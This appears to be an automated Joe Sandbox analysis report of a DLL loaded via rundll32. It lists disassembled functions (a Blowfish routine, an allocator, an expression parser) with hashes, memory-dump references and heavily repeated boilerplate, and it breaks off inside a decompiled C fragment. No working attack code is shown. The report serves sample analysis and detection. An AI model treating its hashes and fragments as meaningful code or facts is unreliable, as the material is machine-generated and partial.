Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_blowfish_crypt_ecb
String ID:
API String ID: 997994871-0
Opcode ID: acf8950ea6c148c44c64157bc22eca501f0550abc9d144bf7c67352d16790dd9
Instruction ID: 3ce9d50094e6346554c2820e15aae8c95f0dca09f8e32c6084807ed2f7b375be
Opcode Fuzzy Hash: acf8950ea6c148c44c64157bc22eca501f0550abc9d144bf7c67352d16790dd9
Instruction Fuzzy Hash: 26019DB59093448FC709CF18E48842AFBE0FB8C355F11892EF8CCA7740E774AA448B46

Uniqueness

Uniqueness Score: -1.00%

Function 100105C0 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

*, xrefs: 100106C6

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: ebd0914c98d536ce5320c55f93b04da2ed1618b2e22c755dc20f5b7cb9212f43
Instruction ID: cf0b5ffff515d544aa88b6753479d2fbc1523f17d7230f1051f2f56c5c5a0ce0
Opcode Fuzzy Hash: ebd0914c98d536ce5320c55f93b04da2ed1618b2e22c755dc20f5b7cb9212f43
Instruction Fuzzy Hash: EB414DB6E083514FD340CE29C88021AF7E1EBC8754F5A892EF8D8DB351E674ED418B82

Uniqueness

Uniqueness Score: -1.00%

Function 10028070 Relevance: .7, Instructions: 659COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6db034cff99af1e7203ee44394934ffb7567196ced3806a0dc990b907df53bb
Instruction ID: 3bfc1c5f2a162aac7bd0c21019aebd2925a812e4926be9baa0010d95d64e9f74
Opcode Fuzzy Hash: d6db034cff99af1e7203ee44394934ffb7567196ced3806a0dc990b907df53bb
Instruction Fuzzy Hash: 9532503274471D4BC708EEE9DC811D5B3D2BB88614F49813C9E15D3706FBB8BA6A96C8

Uniqueness

Uniqueness Score: -1.00%

Function 10033261 Relevance: .6, Instructions: 572COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd6380a6ea4c78d65a7d71ee52a6b8ffee4365087ee231698d748b4880fdc6b
Instruction ID: f869e9a1b34da82721341a2e34109cf1638c9a300c83071e32ba022aecfd3d09
Opcode Fuzzy Hash: 7fd6380a6ea4c78d65a7d71ee52a6b8ffee4365087ee231698d748b4880fdc6b
Instruction Fuzzy Hash: DB228672A083559FC715DE28C8C155AB7F1FF89316F198A2DE9C9AB310D234EE05DB82

Uniqueness

Uniqueness Score: -1.00%

Function 1000B0D0 Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33419a9aeb14ce56b4ab0fd1bc83750a17983b722cf78c8c468c2c97687aa838
Instruction ID: 3194deff8c1016480bd4981d57c44dc359412b19884f203e35b39e086724ce96
Opcode Fuzzy Hash: 33419a9aeb14ce56b4ab0fd1bc83750a17983b722cf78c8c468c2c97687aa838
Instruction Fuzzy Hash: D342DE756087409FC754CF29C58099AFBE2BFCE250F16C92EE899C7356D630E942CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1002A1A1 Relevance: .4, Instructions: 446COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e12ceeeddabea2a45ca0b25d6d0e56ab0a323e72b2d12a6fe70e262d570a28b0
Instruction ID: 9772ef97af37772237b7d3f4791e376c52d85cc118ce0e008e01ab5786da6001
Opcode Fuzzy Hash: e12ceeeddabea2a45ca0b25d6d0e56ab0a323e72b2d12a6fe70e262d570a28b0
Instruction Fuzzy Hash: 0002F1719083058FC314CF28D88025ABBF2EFCA344F59896ED8989F356D775D986CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10027220 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 649db449800bb8f44d4b591db05436e0eed4080366275189c04215ec29e8d69e
Instruction ID: a1783afd4e89d5d45f318d4dea30fc4f4dbee87a7b07b29a2b4422f07ac09f3a
Opcode Fuzzy Hash: 649db449800bb8f44d4b591db05436e0eed4080366275189c04215ec29e8d69e
Instruction Fuzzy Hash: 55E10675B083008FC314CE2CD88060AFBE6BBC9764F598A2DF999D73A1D775E9458B42

Uniqueness

Uniqueness Score: -1.00%

Function 10008144 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fdca86bf5610cf8d83fc9a2a9123c7de6589e9a7e00ce3a8cca6f1a48dd3632
Instruction ID: 8c294614796abfce7a9b313687c0130c20c351539878b9b69ed8c38673feebb7
Opcode Fuzzy Hash: 0fdca86bf5610cf8d83fc9a2a9123c7de6589e9a7e00ce3a8cca6f1a48dd3632
Instruction Fuzzy Hash: 2DA134356002118FD398DE1FD8D0D6A7393ABC432DF5BC26E9E445B3AACD38B4669790

Uniqueness

Uniqueness Score: -1.00%

Function 1000164B Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b52556cb5978d76f0a161bfc99e885d281cec0efd41f06b8f83135470bebe30
Instruction ID: 873dc1b037270df3c72fc734cdf9910190291773d7bcced776bb32a5dc4e00db
Opcode Fuzzy Hash: 4b52556cb5978d76f0a161bfc99e885d281cec0efd41f06b8f83135470bebe30
Instruction Fuzzy Hash: 3081E2745042528FDB94CF29C5C0A96BBE1FF9E310F59C4B9ED988F61AE230A941DF60

Uniqueness

Uniqueness Score: -1.00%

Function 10024280 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e1bf70edc85c72b57ecd771a589712a2623989afca4d70576e69868d5c536e
Instruction ID: d243654ff977fd15b0e0421b28be889c9be6cd6a9a899c254bf598e7771c2fe2
Opcode Fuzzy Hash: 21e1bf70edc85c72b57ecd771a589712a2623989afca4d70576e69868d5c536e
Instruction Fuzzy Hash: 0A4174627043329AE314ABEDF4C045EF2E1FE81BA1B874A69D2952F141D230D84DC7EB

Uniqueness

Uniqueness Score: -1.00%

Function 1000D060 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01961a118ebc83994ce737a496e9055b1f8ab46d9bbd015c8cfe35346e32c7fc
Instruction ID: 6d93bd8323a72235920ba6e149a4a7bae96c73b66a2dfad555009d0c6ff0ce4f
Opcode Fuzzy Hash: 01961a118ebc83994ce737a496e9055b1f8ab46d9bbd015c8cfe35346e32c7fc
Instruction Fuzzy Hash: 5311D2B3F2453203E71CD4199C2136D828387E82B071FC23FDE47A7286EC609D5682D1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C0B0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de151643a332339ce823666c471d4da1aa7b144928b0c7d3fd1e004a2c822b77
Instruction ID: 192b5b8e635135c3962563ef613f7b52fce4010c0b042699b34e9086fceffb22
Opcode Fuzzy Hash: de151643a332339ce823666c471d4da1aa7b144928b0c7d3fd1e004a2c822b77
Instruction Fuzzy Hash: 38316F651087D85ECB11CF3544904EABFE09EAB581B09C49EF8E84B247C524EB09EB71

Uniqueness

Uniqueness Score: -1.00%

Function 100101D0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78873d4f70a7114040ce7729ab5ab63925d14f9cd724e7e38f810f9ad5a330b
Instruction ID: 7615e6e647f5862a10f08712ea71b14590be4302af2179b17c0dfb1654340f57
Opcode Fuzzy Hash: c78873d4f70a7114040ce7729ab5ab63925d14f9cd724e7e38f810f9ad5a330b
Instruction Fuzzy Hash: FF2122726042658BCB14DE19C8D86AB73E2FBC9314F168A68E9C55F205C234F84ACBD1

Uniqueness

Uniqueness Score: -1.00%

Function 100364E0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad436124cf0627712d9c57b5f9352303ce41f418a33c0e13c018656ee81bd46e
Instruction ID: 0140c66fcf905bb5118d3f18eb888db55aaf18b1bd6e0981530fe2a838cae29c
Opcode Fuzzy Hash: ad436124cf0627712d9c57b5f9352303ce41f418a33c0e13c018656ee81bd46e
Instruction Fuzzy Hash: 3521AD3400D7E05EC713DB65849056AFFE1AE9A652F09C9EEE8E84A387D1389614DB23

Uniqueness

Uniqueness Score: -1.00%

Function 1001E0D9 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c76c69a6e16dc7822b4f5a1a757f8ccc5bafd5d8a12991ea2ea248d2ead5663
Instruction ID: 69aa92c53cb6c6df6d72f2decc3ec4bd7719b31d68b56e1e2cf303e831d432a8
Opcode Fuzzy Hash: 0c76c69a6e16dc7822b4f5a1a757f8ccc5bafd5d8a12991ea2ea248d2ead5663
Instruction Fuzzy Hash: 9421BF71A08189EFCB68CF98C8A1A9DBBF5EB09314F244095E905AF751D330EDC1EB55

Uniqueness

Uniqueness Score: -1.00%

Function 1001021B Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123d4edf2cae72c4cb44158153aca10c35860e83f93e9ec1453424ef70596d6d
Instruction ID: bcaa8491dccb865917a35a3d808823525e0e43ff59a73624eea8fea794acadd0
Opcode Fuzzy Hash: 123d4edf2cae72c4cb44158153aca10c35860e83f93e9ec1453424ef70596d6d
Instruction Fuzzy Hash: 141134326041618BCB15CE69C8D86AA73D2FBC9315F17C968E9C69F245C334F94ACBD0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C1B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca7d7dad83a973bb790b37e6832e95b579524e0ac113e1f4aa988c8562b958bd
Instruction ID: f8771a243a862af8759e5689c7b57640d36b1020b076dab7645bd5d8fe9118fc
Opcode Fuzzy Hash: ca7d7dad83a973bb790b37e6832e95b579524e0ac113e1f4aa988c8562b958bd
Instruction Fuzzy Hash: BDF0F676B1435947E900DF459C40B8BB7D9FFC42D8F16052EED48A3305C630BD0586A1

Uniqueness

Uniqueness Score: -1.00%

Function 10017162 Relevance: 100.1, APIs: 56, Strings: 1, Instructions: 337COMMON

Download Yara Rule

APIs

mv_mallocz.F086 ref: 10017236

Strings

Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz
String ID: Invalid chars '%s' at the end of expression '%s'
API String ID: 1901900789-1422635149
Opcode ID: d35623eb4b68d314ae0af4ba429531c6b924d290049fd1e943cfdb02dea8e5ab
Instruction ID: c3773f839444201a897c0eab6702ce5d2794ca60865343955b286594f26e5f05
Opcode Fuzzy Hash: d35623eb4b68d314ae0af4ba429531c6b924d290049fd1e943cfdb02dea8e5ab
Instruction Fuzzy Hash: E1E182B89097459FC780DFA8D08191ABBF1FF88290F95586DF8C58B312D735E881CB92

Uniqueness

Uniqueness Score: -1.00%

Function 10017261 Relevance: 98.3, APIs: 55, Strings: 1, Instructions: 270
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E10017261(void* __eax, void* __ebx, void* __edi, intOrPtr __esi, char _a4, char* _a8, char* _a12, intOrPtr _a16, char _a48, char* _a52, char _a56, char _a60) {
				intOrPtr _t116;
				void* _t118;
				intOrPtr* _t120;

				_t116 = __esi;
				_a12 = __eax;
				__eax = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
				__edx = 0x10;
				_a8 = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
				__eax =  &_a60;
				_a16 = __ebx;
